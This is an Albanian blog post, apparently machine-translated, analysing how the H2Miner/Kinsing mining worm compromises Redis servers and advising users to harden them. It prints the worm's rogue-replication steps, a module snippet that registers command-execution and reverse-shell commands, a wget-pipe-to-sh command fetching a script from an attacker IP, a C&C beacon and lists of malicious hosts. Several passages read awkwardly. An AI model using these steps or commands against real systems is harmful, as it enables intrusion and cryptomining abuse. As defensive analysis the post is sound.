Një ditë më parë, një nga serverët e projektit tim u sulmua nga një krimb i ngjashëm. Në kërkim të një përgjigjeje për pyetjen "çfarë ishte ajo?" Gjeta një artikull të mrekullueshëm nga ekipi i Alibaba Cloud Security. Meqenëse nuk e gjeta këtë artikull në Habré, vendosa ta përkthej posaçërisht për ju <3
Hyrje
Së fundmi, ekipi i sigurisë i Alibaba Cloud zbuloi një shpërthim të papritur të H2Miner. Ky lloj krimbi keqdashës përdor mungesën e autorizimit ose fjalëkalimet e dobëta për Redis si porta hyrëse në sistemet tuaja, pas së cilës ai sinkronizon modulin e tij keqdashës me skllavin përmes sinkronizimit master-slave dhe në fund shkarkon këtë modul keqdashës në makinën e sulmuar dhe ekzekuton keqdashje. udhëzimet.
Në të kaluarën, sulmet në sistemet tuaja kryheshin kryesisht duke përdorur një metodë që përfshin detyrat e planifikuara ose çelësat SSH që ishin shkruar në kompjuterin tuaj pasi sulmuesi hyri në Redis. Për fat të mirë, kjo metodë nuk mund të përdoret shpesh për shkak të problemeve me kontrollin e lejeve ose për shkak të versioneve të ndryshme të sistemit. Sidoqoftë, kjo metodë e ngarkimit të një moduli me qëllim të keq mund të ekzekutojë drejtpërdrejt komandat e sulmuesit ose të fitojë akses në guaskën, gjë që është e rrezikshme për sistemin tuaj.
Për shkak të numrit të madh të serverëve Redis të pritur në internet (rreth 1 milion), ekipi i sigurisë i Alibaba Cloud, si një kujtesë miqësore, rekomandon që përdoruesit të mos ndajnë Redis në internet dhe të kontrollojnë rregullisht fuqinë e fjalëkalimeve të tyre dhe nëse ato janë të rrezikuara. përzgjedhje e shpejtë.
H2Miner
H2Miner është një botnet i minierave për sistemet e bazuara në Linux që mund të pushtojë sistemin tuaj në mënyra të ndryshme, duke përfshirë mungesën e autorizimit në dobësitë e Hadoop fijeve, Docker dhe Redis Remote Command Execution (RCE). Një botnet funksionon duke shkarkuar skriptet me qëllim të keq dhe malware për të minuar të dhënat tuaja, për të zgjeruar sulmin horizontalisht dhe për të mbajtur komunikimet e komandës dhe kontrollit (C&C).
Redis RCE
Njohuritë mbi këtë temë u ndanë nga Pavel Toporkov në ZeroNights 2018. Pas versionit 4.0, Redis mbështet një veçori ngarkimi shtesë që u jep përdoruesve mundësinë të ngarkojnë skedarë të përpiluar me C në Redis për të ekzekutuar komanda specifike Redis. Ky funksion, megjithëse i dobishëm, përmban një dobësi në të cilën, në modalitetin master-slave, skedarët mund të sinkronizohen me skllavin përmes modalitetit të sinkronizimit të plotë. Kjo mund të përdoret nga një sulmues për të transferuar skedarë me qëllim të keq. Pas përfundimit të transferimit, sulmuesit ngarkojnë modulin në instancën e sulmuar Redis dhe ekzekutojnë çdo komandë.
Analiza e krimbave malware
Kohët e fundit, ekipi i sigurisë së Alibaba Cloud zbuloi se madhësia e grupit të minatorëve me qëllim të keq H2Miner është rritur papritmas në mënyrë dramatike. Sipas analizës, procesi i përgjithshëm i shfaqjes së sulmit është si më poshtë:
H2Miner përdor RCE Redis për një sulm të plotë. Sulmuesit sulmojnë fillimisht serverët e pambrojtur Redis ose serverët me fjalëkalime të dobëta.
Pastaj ata përdorin komandën config set dbfilename red2.so për të ndryshuar emrin e skedarit. Pas kësaj, sulmuesit ekzekutojnë komandën slaveof për të vendosur adresën e hostit të replikimit master-slave.
Kur shembulli Redis i sulmuar krijon një lidhje master-slave me Redis-in me qëllim të keq që është në pronësi të sulmuesit, sulmuesi dërgon modulin e infektuar duke përdorur komandën fullresync për të sinkronizuar skedarët. Skedari red2.so më pas do të shkarkohet në makinën e sulmuar. Sulmuesit më pas përdorin modulin e ngarkimit ./red2.so për të ngarkuar këtë skedar so. Moduli mund të ekzekutojë komanda nga një sulmues ose të inicojë një lidhje të kundërt (backdoor) për të fituar akses në makinën e sulmuar.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Pas ekzekutimit të një komande me qëllim të keq si p.sh / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, sulmuesi do të rivendosë emrin e skedarit rezervë dhe do të shkarkojë modulin e sistemit për të pastruar gjurmët. Megjithatë, skedari red2.so do të mbetet ende në makinën e sulmuar. Përdoruesit këshillohen t'i kushtojnë vëmendje pranisë së një skedari të tillë të dyshimtë në dosjen e shembullit të tyre Redis.
Përveç vrasjes së disa proceseve me qëllim të keq për të vjedhur burimet, sulmuesi ndoqi një skript me qëllim të keq duke shkarkuar dhe ekzekutuar skedarë binare me qëllim të keq në . Kjo do të thotë që emri i procesit ose emri i drejtorisë që përmban kinsing në host mund të tregojë se ajo makinë është infektuar nga ky virus.
Sipas rezultateve të inxhinierisë së kundërt, malware kryen kryesisht funksionet e mëposhtme:
- Ngarkimi i skedarëve dhe ekzekutimi i tyre
- Miniera
- Ruajtja e komunikimit C&C dhe ekzekutimi i komandave të sulmuesit
Përdorni Masscan për skanim të jashtëm për të zgjeruar ndikimin tuaj. Përveç kësaj, adresa IP e serverit C&C është e koduar në program dhe hosti i sulmuar do të komunikojë me serverin e komunikimit C&C duke përdorur kërkesat HTTP, ku informacioni zombie (serveri i komprometuar) identifikohet në kokën HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Metoda të tjera sulmi
Adresat dhe lidhjet e përdorura nga krimbi
/familjari
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Совет
Së pari, Redis nuk duhet të jetë i aksesueshëm nga interneti dhe duhet të mbrohet me një fjalëkalim të fortë. Është gjithashtu e rëndësishme që klientët të kontrollojnë që nuk ka skedar red2.so në direktorinë Redis dhe se nuk ka "kinsing" në emrin e skedarit/procesit në host.
Burimi: www.habr.com